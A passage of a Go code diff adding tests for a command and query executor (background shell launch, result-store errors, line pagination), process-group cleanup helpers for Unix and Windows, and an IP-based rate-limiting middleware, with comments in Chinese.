ctx := context.Background()
|
||||
args := map[string]interface{}{
|
||||
"execution_id": "test_id",
|
||||
}
|
||||
|
||||
toolResult, err := executor.executeQueryExecutionResult(ctx, args)
|
||||
if err != nil {
|
||||
t.Fatalf("执行查询失败: %v", err)
|
||||
}
|
||||
|
||||
if !toolResult.IsError {
|
||||
t.Fatal("未初始化的存储应该返回错误")
|
||||
}
|
||||
|
||||
if !strings.Contains(toolResult.Content[0].Text, "结果存储未初始化") {
|
||||
t.Errorf("错误消息应该包含'结果存储未初始化'")
|
||||
}
|
||||
}
|
||||
|
||||
func TestExecuteSystemCommand_BackgroundDoesNotBlockOnChildStdout(t *testing.T) {
|
||||
executor, _ := setupTestExecutor(t)
|
||||
// 子进程先向 stdout 写无换行字符再长时间 sleep;若与 echo $pid 共享管道且未重定向子进程 stdout,
|
||||
// ReadString('\n') 会阻塞到子进程退出。后台包装须将子进程标准流与 PID 行分离。
|
||||
ctx, cancel := context.WithTimeout(context.Background(), 4*time.Second)
|
||||
defer cancel()
|
||||
args := map[string]interface{}{
|
||||
"command": `(sh -c 'printf x; sleep 120') &`,
|
||||
"shell": "sh",
|
||||
}
|
||||
res, err := executor.executeSystemCommand(ctx, args)
|
||||
if err != nil {
|
||||
t.Fatalf("executeSystemCommand: %v", err)
|
||||
}
|
||||
if res == nil || res.IsError {
|
||||
t.Fatalf("expected success, got %+v", res)
|
||||
}
|
||||
txt := res.Content[0].Text
|
||||
if !strings.Contains(txt, "后台命令已启动") {
|
||||
t.Fatalf("unexpected body: %q", txt)
|
||||
}
|
||||
}
|
||||
|
||||
func TestPaginateLines(t *testing.T) {
|
||||
lines := []string{"Line 1", "Line 2", "Line 3", "Line 4", "Line 5"}
|
||||
|
||||
// 测试第一页
|
||||
page := paginateLines(lines, 1, 2)
|
||||
if page.Page != 1 {
|
||||
t.Errorf("页码不匹配。期望: 1, 实际: %d", page.Page)
|
||||
}
|
||||
if page.Limit != 2 {
|
||||
t.Errorf("每页行数不匹配。期望: 2, 实际: %d", page.Limit)
|
||||
}
|
||||
if page.TotalLines != 5 {
|
||||
t.Errorf("总行数不匹配。期望: 5, 实际: %d", page.TotalLines)
|
||||
}
|
||||
if page.TotalPages != 3 {
|
||||
t.Errorf("总页数不匹配。期望: 3, 实际: %d", page.TotalPages)
|
||||
}
|
||||
if len(page.Lines) != 2 {
|
||||
t.Errorf("第一页行数不匹配。期望: 2, 实际: %d", len(page.Lines))
|
||||
}
|
||||
|
||||
// 测试第二页
|
||||
page2 := paginateLines(lines, 2, 2)
|
||||
if len(page2.Lines) != 2 {
|
||||
t.Errorf("第二页行数不匹配。期望: 2, 实际: %d", len(page2.Lines))
|
||||
}
|
||||
if page2.Lines[0] != "Line 3" {
|
||||
t.Errorf("第二页第一行不匹配。期望: Line 3, 实际: %s", page2.Lines[0])
|
||||
}
|
||||
|
||||
// 测试最后一页
|
||||
page3 := paginateLines(lines, 3, 2)
|
||||
if len(page3.Lines) != 1 {
|
||||
t.Errorf("第三页行数不匹配。期望: 1, 实际: %d", len(page3.Lines))
|
||||
}
|
||||
|
||||
// 测试超出范围的页码(应该返回最后一页)
|
||||
page4 := paginateLines(lines, 4, 2)
|
||||
if page4.Page != 3 {
|
||||
t.Errorf("超出范围的页码应该被修正为最后一页。期望: 3, 实际: %d", page4.Page)
|
||||
}
|
||||
if len(page4.Lines) != 1 {
|
||||
t.Errorf("最后一页应该只有1行。实际: %d行", len(page4.Lines))
|
||||
}
|
||||
|
||||
// 测试无效页码(小于1)
|
||||
page0 := paginateLines(lines, 0, 2)
|
||||
if page0.Page != 1 {
|
||||
t.Errorf("无效页码应该被修正为1。实际: %d", page0.Page)
|
||||
}
|
||||
|
||||
// 测试空列表
|
||||
emptyPage := paginateLines([]string{}, 1, 10)
|
||||
if emptyPage.TotalLines != 0 {
|
||||
t.Errorf("空列表的总行数应该为0。实际: %d", emptyPage.TotalLines)
|
||||
}
|
||||
if len(emptyPage.Lines) != 0 {
|
||||
t.Errorf("空列表应该返回空结果。实际: %d行", len(emptyPage.Lines))
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,31 @@
|
||||
//go:build !windows
|
||||
|
||||
package security
|
||||
|
||||
import (
|
||||
"os/exec"
|
||||
"syscall"
|
||||
)
|
||||
|
||||
// prepareShellCmdSession 让 shell 子进程在独立会话中运行,便于超时/取消时整组 SIGKILL(含子进程)。
|
||||
func prepareShellCmdSession(cmd *exec.Cmd) error {
|
||||
if cmd == nil {
|
||||
return nil
|
||||
}
|
||||
if cmd.SysProcAttr == nil {
|
||||
cmd.SysProcAttr = &syscall.SysProcAttr{}
|
||||
}
|
||||
cmd.SysProcAttr.Setsid = true
|
||||
return nil
|
||||
}
|
||||
|
||||
// terminateCmdTree 尽力终止 cmd 及其进程组(Unix 下 Setsid 后 PGID == 首进程 PID)。
|
||||
func terminateCmdTree(cmd *exec.Cmd) {
|
||||
if cmd == nil || cmd.Process == nil {
|
||||
return
|
||||
}
|
||||
pid := cmd.Process.Pid
|
||||
if err := syscall.Kill(-pid, syscall.SIGKILL); err != nil {
|
||||
_ = cmd.Process.Kill()
|
||||
}
|
||||
}
|
||||
@@ -0,0 +1,17 @@
|
||||
//go:build windows
|
||||
|
||||
package security
|
||||
|
||||
import "os/exec"
|
||||
|
||||
func prepareShellCmdSession(cmd *exec.Cmd) error {
|
||||
_ = cmd
|
||||
return nil
|
||||
}
|
||||
|
||||
func terminateCmdTree(cmd *exec.Cmd) {
|
||||
if cmd == nil || cmd.Process == nil {
|
||||
return
|
||||
}
|
||||
_ = cmd.Process.Kill()
|
||||
}
|
||||
@@ -0,0 +1,81 @@
|
||||
package security
|
||||
|
||||
import (
|
||||
"net/http"
|
||||
"sync"
|
||||
"time"
|
||||
|
||||
"github.com/gin-gonic/gin"
|
||||
)
|
||||
|
||||
// rateLimitEntry 记录某个 IP 的请求窗口信息
|
||||
type rateLimitEntry struct {
|
||||
count int
|
||||
windowAt time.Time
|
||||
}
|
||||
|
||||
// RateLimiter 基于 IP 的滑动窗口速率限制器
|
||||
type RateLimiter struct {
|
||||
mu sync.Mutex
|
||||
entries map[string]*rateLimitEntry
|
||||
limit int // 窗口内允许的最大请求数
|
||||
window time.Duration // 窗口时长
|
||||
}
|
||||
|
||||
// NewRateLimiter 创建速率限制器
|
||||
func NewRateLimiter(limit int, window time.Duration) *RateLimiter {
|
||||
rl := &RateLimiter{
|
||||
entries: make(map[string]*rateLimitEntry),
|
||||
limit: limit,
|
||||
window: window,
|
||||
}
|
||||
// 后台定期清理过期条目,防止内存泄漏
|
||||
go rl.cleanup()
|
||||
return rl
|
||||
}
|
||||
|
||||
// cleanup 每分钟清理一次过期条目
|
||||
func (rl *RateLimiter) cleanup() {
|
||||
ticker := time.NewTicker(1 * time.Minute)
|
||||
defer ticker.Stop()
|
||||
for range ticker.C {
|
||||
rl.mu.Lock()
|
||||
now := time.Now()
|
||||
for ip, entry := range rl.entries {
|
||||
if now.Sub(entry.windowAt) > rl.window {
|
||||
delete(rl.entries, ip)
|
||||
}
|
||||
}
|
||||
rl.mu.Unlock()
|
||||
}
|
||||
}
|
||||
|
||||
// allow 检查指定 IP 是否允许通过
|
||||
func (rl *RateLimiter) allow(ip string) bool {
|
||||
rl.mu.Lock()
|
||||
defer rl.mu.Unlock()
|
||||
|
||||
now := time.Now()
|
||||
entry, ok := rl.entries[ip]
|
||||
if !ok || now.Sub(entry.windowAt) > rl.window {
|
||||
rl.entries[ip] = &rateLimitEntry{count: 1, windowAt: now}
|
||||
return true
|
||||
}
|
||||
|
||||
entry.count++
|
||||
return entry.count <= rl.limit
|
||||
}
|
||||
|
||||
// RateLimitMiddleware 返回 Gin 中间件,对超限请求返回 429
|
||||
func RateLimitMiddleware(rl *RateLimiter) gin.HandlerFunc {
|
||||
return func(c *gin.Context) {
|
||||
ip := c.ClientIP()
|
||||
if !rl.allow(ip) {
|
||||
c.AbortWithStatusJSON(http.StatusTooManyRequests, gin.H{
|
||||
"error": "rate limit exceeded, please try again later",
|
||||
})
|
||||
return
|
||||
}
|
||||
c.Next()
|
||||
}
|
||||
}
|
||||
Reference in New Issue
Block a user